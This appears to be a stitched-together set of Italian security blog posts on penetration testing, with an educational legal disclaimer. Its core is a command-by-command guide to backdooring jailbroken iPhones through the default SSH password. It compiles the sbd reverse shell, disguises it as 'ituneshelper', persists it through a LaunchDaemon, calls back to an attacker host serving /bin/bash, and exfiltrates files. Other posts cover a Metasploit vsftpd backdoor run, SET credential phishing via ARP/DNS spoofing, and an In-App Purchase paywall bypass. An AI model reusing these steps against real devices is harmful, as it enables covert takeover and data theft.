network_security

Sommario

Viene presentata la simulazione di un attacco informatico, Penetration Testing, un metodo di valutare la sicurezza di un sistema o di una rete.
L’analisi viene condotta dalla posizione di un potenziale aggressore il quale attraverso più fasi individuerà una o più debolezze, tali vulnerabilità potranno essere sfruttare per compromettere il funzionamento del sistema.
Il Penetration Testing ha pertanto lo scopo di individuare vulnerabilità informatiche, rilevando il maggior numero di dettagli sulla vulnerabilità che permettono un accesso non autorizzato.

Abstract

Presents the simulation of a cyber attack, Penetration Testing, a method of evaluating the safety of a system or network.
The analysis is carried out from the position of a potential attacker, through multiple stages will identify one or more weaknesses, such vulnerability may be exploited to compromise the operation of the system.
The Penetration Testing therefore the aim of identifying computer vulnerabilities, noting many details on the vulnerabilities that allow unauthorized access.

Introduzione

La corsa agli armamenti è in atto, è quanto sostiene McAfee in un recente report, ma non per guerre materiali ma per attacchi informatici. La Sicurezza Informatica è ormai una priorità di tutti gli stati addirittura in alcuni casi maggiore della difesa missilistica, pertanto affronteremo in questo articolo una simulazione di un Penetration Test partendo dalle prime fasi di un attacco fino a fornire esempi pratici sulla metodologia applicata e i tools utilizzati.

L’attenzione verso la Sicurezza Informatica è cresciuta negli ultimi anni proporzionalmente alla diffusione di sistemi informatici e all’incremento della collettività nell’utilizzo dei PC. L’Hacker Etico è oggi una figura ricercata ed importante per grandi aziende o stati al fine di rilevare e sconfiggere eventuali minacce derivanti da attacchi informatici.

L’obbiettivo di un sistema protetto è di garantire l’accesso e l’integrità all’informazione ai soli utenti che ne hanno facoltà, impedendo l’accesso abusivo da parte di estranei o evitando l’alterazione delle informazioni in esso contenute.

Il Penetration Test è dunque il processo operativo in grado di valutare la sicurezza di un sistema o di una rete simulando l’attacco di un utente malintenzionato, il fine è l’ottenimento di informazioni protette o il controllo completo del sistema remoto sfruttando le proprie competenze, aiutandosi anche con software automatici. Auditor è colui che svolge tutte le attività di verifica operando con logiche medesime a quelle di un Hacker.

L’analisi intrapresa da un Auditor comprende più fasi ed ha l’obiettivo di evidenziare in un report le debolezze rilevate nella piattaforma, fornendo il maggior numero di informazioni sulle vulnerabilità sfruttate per ottenere l’accesso non autorizzato. Tutti i problemi rilevati vengono quindi presentati fornendo una stima chiara sull’attuale capacità di difesa e del livello di penetrazione raggiunto nei confronti delle vulnerabilità del sistema interne ed esterne ed eventualmente delle vulnerabilità fisiche.

L’Auditor non si fermerà ad analizzare i soli sistemi informatici ma potrà sfruttare tecniche di Ingegneria Sociale per verificare eventuali carenze formative del personale aziendale di fronte a tentativi di intrusione; questa modalità definita Hidden Mode prevede l’accordo esclusivamente con il consiglio amministrativo dell’azienda che commissiona le verifiche lasciando all’oscuro tutto il personale, compreso il settore IT dell’azienda.

Continua a leggere

Il blog Security Obscurity ha recentemente pubblicato un interessante video in cui mostra come un utente malintenzionato può recuperare le credenziale degli utenti che tentano di loggarsi in una piattaforma WEB in un ambiente LAN.

Per sferrare l’attacco viene usato l’applicativo SET simulando il recupero delle credenziali di accesso di un utente che tenta di collegarsi al noto Social Network Facebook, SET avrà il compito di clonare l’attuale homepage di Facebook e configurare un server in ascolto sulla porta 80 con il portale clonato.

Successivamente con un Arp-Scan vengono identificate le potenziali vittime nella rete e sfruttando Net Command di Evilsocket si esegue un Arp Spoofing per reindirizzare il traffico attraverso l’attaccante.

Infine si effettua un DNS Spoofing  così tutte le richieste inviate dalla vittima verranno reindirizzate all’attaccante, compresi i dati di login.

Per tutti i dettagli e le procedure potete consultare i video di apertura.

Il blog Coresec ha recentemente pubblicato una interessante guida su come installare una Backdoor permanente su un dispositivo iOS (iPhone, iPod Touch e iPad) a patto che il sistema sia stata Jailbrekkato e quindi vi siano attivi i permessi di root.

Molti utenti effettuando la procedura di Jailbreak per avere facilmente accesso ai propri file o alle applicazioni (per poi essere illegalmente copiate), questa procedura prevede l’installazione del pacchetto OpenSSH che permette di accedere remotamente al dispositivo tramite una semplice sessione SSH. Purtroppo gli utenti incuranti della sicurezza non procedono a cambiare la password di default (alpine) e quindi basta ritrovarsi collegati ad una rete wireless pubblica per essere una probabile vittima di un attaccante.

In questo articolo supponiamo che Mario abbia effettuato il Jailbreak del suo iPhone, installato OpenSSH senza cambiare la password di default e si trova all’Università dove è disponibile una rete WiFi pubblica senza alcuna protezione di tipo “Client Isolation”.

L’attaccante procederà ad una scansione di rete all’interno della rete WiFi dell’università, individuerà l’iPhone di Mario con il quale aprirà semplicemente una sessione SSH. Successivamente procederà all’installazione della Backdoor sbd-1.36 sviluppata da Michel Blomgren.

Una volta aperta la sessione SSH procediamo all’installazione ed esecuzione delle pacchetto iphone-gcc

</p>
<p>iphone4:~ root# uname -an<br />
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin</p>
<p>iphone4:~ root# apt-get update<br />
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]<br />
Hit http://cydia.zodttd.com stable Release.gpg<br />
Hit http://apt.saurik.com ios/675.00 Release.gpg<br />
Hit http://repo.insanelyi.com ./ Release.gpg<br />
...</p>
<p>iphone4:~ root# apt-get install iphone-gcc<br />
Reading package lists... Done<br />
Building dependency tree<br />
Reading state information... Done<br />
...<br />
Setting up ldid (610-5) ...<br />
Setting up com.sull.iphone-gccheaders (1.0-11) ...<br />
Setting up com.sull.fake-libgcc (1.0-2) ...<br />
Setting up iphone-gcc (4.2-20080604-1-8) ...</p>
<p>iphone4:~/sbd-1.36 root# apt-get install make<br />
Reading package lists... Done<br />
Building dependency tree<br />
Reading state information... Done<br />
...<br />
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...<br />
Setting up make (3.81-2) ...</p>
<p>

Scarichiamo ed estraiamo la Backdoor

</p>
<p>iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz<br />
--2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz<br />
Resolving packetstorm.tacticalflex.com... 173.160.180.156<br />
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.<br />
HTTP request sent, awaiting response... 200 OK<br />
Length: 84093 (82K) [application/x-gzip]<br />
Saving to: `sbd-1.36.tar.gz'</p>
<p>100%[======================================&gt;] 84,093 66.3K/s in 1.2s</p>
<p>2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]</p>
<p>iphone4:~ root# tar -zxvf sbd-1.36.tar.gz<br />
sbd-1.36/<br />
sbd-1.36/sbd.c<br />
sbd-1.36/doexec.c<br />
sbd-1.36/pel.c<br />
sbd-1.36/aes.c<br />
sbd-1.36/sha1.c<br />
sbd-1.36/socket_code.h<br />
sbd-1.36/pel.h<br />
sbd-1.36/aes.h<br />
sbd-1.36/sha1.h<br />
sbd-1.36/sbd.h<br />
sbd-1.36/doexec_unix.h<br />
sbd-1.36/doexec_win32.h<br />
sbd-1.36/readwrite.h<br />
sbd-1.36/misc.h<br />
sbd-1.36/Makefile<br />
sbd-1.36/mktarball.sh<br />
sbd-1.36/README<br />
sbd-1.36/COPYING<br />
sbd-1.36/CHANGES<br />
sbd-1.36/binaries/<br />
sbd-1.36/binaries/sbd.exe<br />
sbd-1.36/binaries/sbdbg.exe</p>
<p>iphone4:~ root# cd sbd-1.36<br />
iphone4:~/sbd-1.36 root# ls -al<br />
total 224<br />
drwx------ 3 1000 100 748 Sep 17 2004 ./<br />
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../<br />
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES<br />
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING<br />
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile<br />
-rw------- 1 1000 100 4880 Sep 11 2004 README<br />
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c<br />
-rw------- 1 1000 100 549 Jun 11 2004 aes.h<br />
drwx------ 2 1000 100 136 Sep 11 2004 binaries/<br />
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c<br />
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h<br />
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h<br />
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h<br />
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*<br />
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c<br />
-rw------- 1 1000 100 898 Sep 9 2004 pel.h<br />
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h<br />
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c<br />
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h<br />
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c<br />
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h<br />
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h</p>
<p>

Procediamo alla configurazione della Backdoor (esecuzione come demone, indirizzo ip, porta, password, impostazioni di crittografia, ecc ecc).

</p>
<p>iphone4:~/sbd-1.36 root# cat sbd.h<br />
#define SOURCE_PORT 0<br />
#define CONVERT_TO_CRLF 0<br />
#define ENCRYPTION 1<br />
#define SHARED_SECRET &quot;password&quot;<br />
#define QUIET 0<br />
#define VERBOSE 0<br />
#define DAEMONIZE 0<br />
#define HIGHLIGHT_INCOMING 0<br />
#define HIGHLIGHT_PREFIX &quot;\x1b[0;32m&quot;<br />
#define HIGHLIGHT_SUFFIX &quot;\x1b[0m&quot;<br />
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA &quot;: &quot;<br />
#define RUN_ONLY_ONE_INSTANCE 0<br />
#define INSTANCE_SEMAPHORE &quot;shadowinteger_bd_semaphore&quot;</p>
<p>/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.<br />
* reconnect every 10 seconds.<br />
*/</p>
<p>#define DOLISTEN 0<br />
#define HOST &quot;192.168.200.22&quot;<br />
#define PORT 443<br />
#define RESPAWN_ENABLED 1<br />
#define RESPAWN_INTERVAL 10<br />
#define EXECPROG &quot;/bin/bash&quot;</p>
<p>

Compiliamo SBD

<br />
&lt;pre&gt;iphone4:~/sbd-1.36 root# make<br />
usage:<br />
make unix - Linux, NetBSD, FreeBSD, OpenBSD<br />
make sunos - SunOS (Solaris)<br />
make win32 - native win32 console app (w/ Cygwin + MinGW)<br />
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)<br />
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app<br />
make mingw - native win32 console app (w/ MinGW MSYS)<br />
make mingwbg - native win32 no-console app (w/ MinGW MSYS)<br />
make cygwin - Cygwin console app<br />
make darwin - Darwin</p>
<p>iphone4:~/sbd-1.36 root# make darwin<br />
rm -f sbd sbd.exe *.o core<br />
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c<br />
strip sbd</p>
<p>iphone4:~/sbd-1.36 root# ls -al sbd<br />
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*<br />

Impostiamo l’avvio automatico della Backdoor attraverso LaunchDaemons

<br />
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper<br />
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/<br />
iphone4:/Library/LaunchDaemons root# ls -al<br />
total 16<br />
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./<br />
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../<br />
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist</p>
<p>iphone4:/Library/LaunchDaemons root# cat &lt;&lt; EOF &gt;&gt; com.ituneshelper.start.plist<br />
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br />
&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;&gt;<br />
&lt;plist version=&quot;1.0&quot;&gt;<br />
&lt;dict&gt;<br />
&lt;key&gt;Label&lt;/key&gt;<br />
&lt;string&gt;com.ituneshelper.start&lt;/string&gt;<br />
&lt;key&gt;ProgramArguments&lt;/key&gt;<br />
&lt;array&gt;<br />
&lt;string&gt;/usr/bin/ituneshelper&lt;/string&gt;<br />
&lt;/array&gt;<br />
&lt;key&gt;RunAtLoad&lt;/key&gt;<br />
&lt;true/&gt;<br />
&lt;key&gt;StartInterval&lt;/key&gt;<br />
&lt;integer&gt;1&lt;/integer&gt;<br />
&lt;/dict&gt;<br />
&lt;/plist&gt;<br />
EOF</p>
<p>iphone4:/Library/LaunchDaemons root# ls -al<br />
total 16<br />
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./<br />
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../<br />
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist<br />
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist<br />

L’installazione della Backdoor è conclusa, procediamo quindi a testare la connessione dal nostro PC

<br />
[email protected]:~# uname -an<br />
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux</p>
<p>[email protected]:~# ifconfig<br />
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e<br />
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0<br />
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link<br />
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1<br />
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0<br />
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0<br />
          collisions:0 txqueuelen:1000<br />
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)</p>
<p>[email protected]:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password<br />
id<br />
uid=0(root) gid=0(wheel) groups=0(wheel)<br />
/bin/bash -i<br />
bash: no job control in this shell<br />
bash-4.0# ps -ef<br />
UID PID PPID C STIME TTY TIME CMD<br />
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd<br />
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System<br />
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd<br />
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd<br />
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd<br />
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic<br />
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard<br />
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled<br />
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd<br />
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd<br />
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd<br />
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd<br />
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid<br />
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd<br />
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd<br />
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted<br />
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd<br />
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent<br />
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd<br />
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd<br />
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90<br />
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd<br />
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd<br />
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated<br />
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer<br />
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd<br />
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper<br />
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd<br />
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail<br />
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone<br />
0 286 94 0 0:00.00 ?? 0:00.03 bash<br />
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i<br />
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef</p>
<p>bash-4.0# uname -an<br />
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin<br />

Se per esempio vogliamo trasferire un file dal dispositivo

<br />
[email protected]:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret &gt; output.file</p>
<p>iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345<br />

Infine vi riportiamo la procedura per disinstallare la Backdoor

<br />
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist<br />
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper<br />

iScanner è un software scritto in Ruby che permette di individuare ed eventualmente rimuovere codice maligno all’interno delle pagine web, nello specifico l’applicativo permette:

  • Rilevamento di codice maligno all’interno delle pagine web;
  • Rimozione automatica di un eventuale codice sospetto all’interno delle pagine web;
  • Sistema di Backup dei file elaborati;
  • Database aggiornabile;
  • Report all’interno di un file di log delle minacce rilevate con la possibilità di inviare una eMail riepilogativa.

L’installazione del software è veramente molto semplice, una volta effettuato il Download dell’applicativo ed estratto l’archivio basterà digitare da shell il seguente comando:

./installer -i

successivamente lanciando il comando:

iscanner .h

è possibile visualizzare tutti i comandi disponibili che per comodità vi riepilogo dopo il salto.

Nell’immagine principale ho analizzato un sito web segnalatomi attraverso la Mailing List  Sikurezza.org (Italian Security Mailing List) nella quale un utente richiedeva maggiori informazioni di attendibilità del sito glandorepartners.com e come lo stesso utente prevedeva la pagina web contiene un codice Javascript offuscato.

Un codice Javascript offuscato solitamente è portatore di operazioni malevoli ma non è sempre scontato, pertanto conviene successivamente analizzare il codice estrapolandolo dal file di log e con un po’ di pazienza procediamo all’analisi.

Nell’esempio riportato il presunto codice malevolo invia ad ogni accesso al sito web una eMail all’indirizzo acollins [AT] glandorehealthcare.com informando il webmaster della nostra visita.

Continua a leggere

Versione:
vsftpd-2.3.4 del 30/06/2011

Dimostrazione Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

WhatWeb è un tool sviluppato da Andrew Horton nel Novembre del 2009 ed ha come scopo l’estrapolazione di maggiori informazioni tecniche su uno o più host. Per informazioni tecniche si intendono tutti i dati rilevanti per una corretta analisi di IT Security quali la versione del
server Apache, PHP, CMS ed altre informazioni che andremo a scoprire in questo articolo.

Installazione

WhatWeb è un applicativo per ambienti Linux e richiede Ruby per poter funzionare ed altre importanti dipendenze, di seguito vi riporto un esempio di installazione in ambiente Ubuntu.

Innanzitutto installiamo Ruby da riga di comando con il seguente comando:

sudo apt-get install ruby ruby-dev libopenssl-ruby rubygems1.8

successivamente dovremo installare le seguenti dipendenze di Ruby, sempre da riga di comando imputiamo:

sudo gem install anemone em-resolv-replace json bson bson_ext mongo rchardet

Terminata questa prima fase scaricate WhatWeb dal sito di Andrew Norton (http://bit.ly/kspIud) e salvatelo dove preferite.

Avvio

L’avvio di WhatWeb è veramente semplicissimo, si utilizza esclusivamente da riga di comando, basterà digitare il comando ./whatweb che immediatamente ci apparirà a monitor l’help con tutti i possibili comandi da sfruttare.

Utilizzo

L’imponente Help che vi è apparso a monitor una volta lanciato l’applicativo non vi deve spaventare 🙂 l’utilizzo è abbastanza semplice e comunque vi riepilogherò le principali funzioni.
WhatWeb funziona attraverso dei plugin, più di 800, che permettono la corretta scansione di un host e vengono gestiti dal software in base al livello di “aggressione” che preferite:

  1. 1. PASSIVA: Effettua una sola richiesta sul target, fatta eccezione per i reindirizzamenti.
  2. 2. VUOTO: Livello ad oggi non implementato, verrà sviluppato in futuro.
  3. 3. AGGRESSIVO: Effettua una scansione approfondita del host principale
  4. 4. PESANTE: Scassinamento approfondito su tutti gli URL del host.

Il livello di default è il primo, ma personalmente vi consiglio di utilizzare sempre il terzo ed attivare la modalità VERBOSE in modo da avere nozioni più esplicative.
È inoltre possibile impostare l’User Agent, il server Proxy, l’esportazione personalizzata dei log e la possibilità di gestire i redirect.

Esempio

Lanciando il seguente comando:

whatweb –log-verbose=log.txt –aggression=3 www.iltrillo.com

andremo ad avviare il programma con il terzo livello di aggressività e gli chiederemo di generare un file “log.txt” contenente il risultato in modalità verbose della scansione ma di riportarci a monitor immediatamente le nozioni essenziali sul host www.iltrillo.com.
Visualizzando il risultato della scansione notiamo immediatamente che il software ha analizzato l’host da noi fornitogli ma ha proseguito ad analizzare il redirect www.iltrillo.com/forum/ dal quale possiamo trarre nozioni importanti.

Il server che ospita il nostro Host è di tipo Unix con Apache 2.0.63 e PHP 5.2.14. Si trova in Olanda, le nostre visite vengono monitorate tramite Google Analytics, il forum è basato sulla piattaforma vBulletin 4.0.4 e vi è un blog basato su WordPress.

Basterà pertanto approfondire le ricerche per capire se le versioni rilevate soffrono di Exploit permettendoci di compilare un completo report da IT Security Researcher.

Software Utilizzato

Per effettuare questa video guida ho utilizzato WepCrackGUI e la distribuzione Linux BackBox.

Note Legali

L’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge art. 615-ter c.p.

La detenzione, la diffusione abusiva di codici di accesso a sistemi informatici/telematici o condotte prodromiche alla realizzazione di un acceso abusivo sono reati penale perseguibili secondo la legge 615-quater c.p.

Pertanto l’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete la quale il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Gli Autori di questo Blog non potranno essere ritenuti responsabili di eventuali violazioni derivanti da un uso proprio o improprio delle tecniche esposte in questo articolo aventi uno scopo prettamente informativo e didattico.

In questo video prodotto da Clshack vediamo come è possibile reindirizzare il traffico dati di un PC verso un host inesistente, oppure bloccare la connessione ad un singolo sito web con tcpkill durante un arp poisoning.

Trovate maggiori dettagli sulla configurazione di Scapy direttamente sul sito dell’autore.

Oggi vedremo come installare WepCrackGUI sulla distribuzione BackBox dedicata al penetration testing, innanzitutto scarichiamo il software dal SourceForge e scompattiamolo dopo preferiamo.

Da riga di comando dovremo installare Mono e GTK necessari per il corretto avvio di WepCrakGUI, iniziamo con Mono! Avviamo la riga di comando e digitiamo:

sudo apt-get install mono-devel

ad installazione avvenuta passiamo subito alle librerie grafiche GTK:

sudo apt-get install gtk-sharp2

perfetto ora potremo avviare WepCrackGUI col classico comando

sudo ./wepcrack

Descrizione

Questo video ha l’intento di dimostrarvi come sia possibile aggirare la metodologia di acquisto di una Rivista o Quotidiano nell’iPad o altro dispositivo iOS, permettendoci di accedere al contenuto desiderato in maniera totalmente gratuita evitando il pagamento del contributo richiesto attraverso In-App Purchase di Apple.

Nel video viene dimostrato esclusivamente la fattibilità di quanto dichiarato ma non verranno, volutamente, esposte le tecniche che portano a tale risultato a tutela del mondo dell’editoria Italiana ed Internazionale. Per questa motivazione non è visibile nel video la barra degli indirizzi del Browser Safari e non solo.

Funzionamento

Dopo una attenta analisi dei pacchetti di rete ricevuti ed inviati (packet sniffer) da ogni singola applicazione è possibile determinare la fonte dei quotidiani o riviste, successivamente sfruttando la tecnica di spoofing è possibile accedere direttamente da Safari al contenuto desiderato evitando il pagamento tramite l’In-App Purchase del contributo richiesto dall’editore.

Viene dimostrato il funzionamento dell’exploit su un ristretto numero di Riviste ed un Quotidiano ma è possibile estendere tale tecnica anche per la lettura di altre testate.

Conclusione

Tale dimostrazione ha lo scopo di incentivare gli sviluppatori a migliorare le loro applicazioni e a progettare con un maggiore accuratezza le infrastrutture di rete.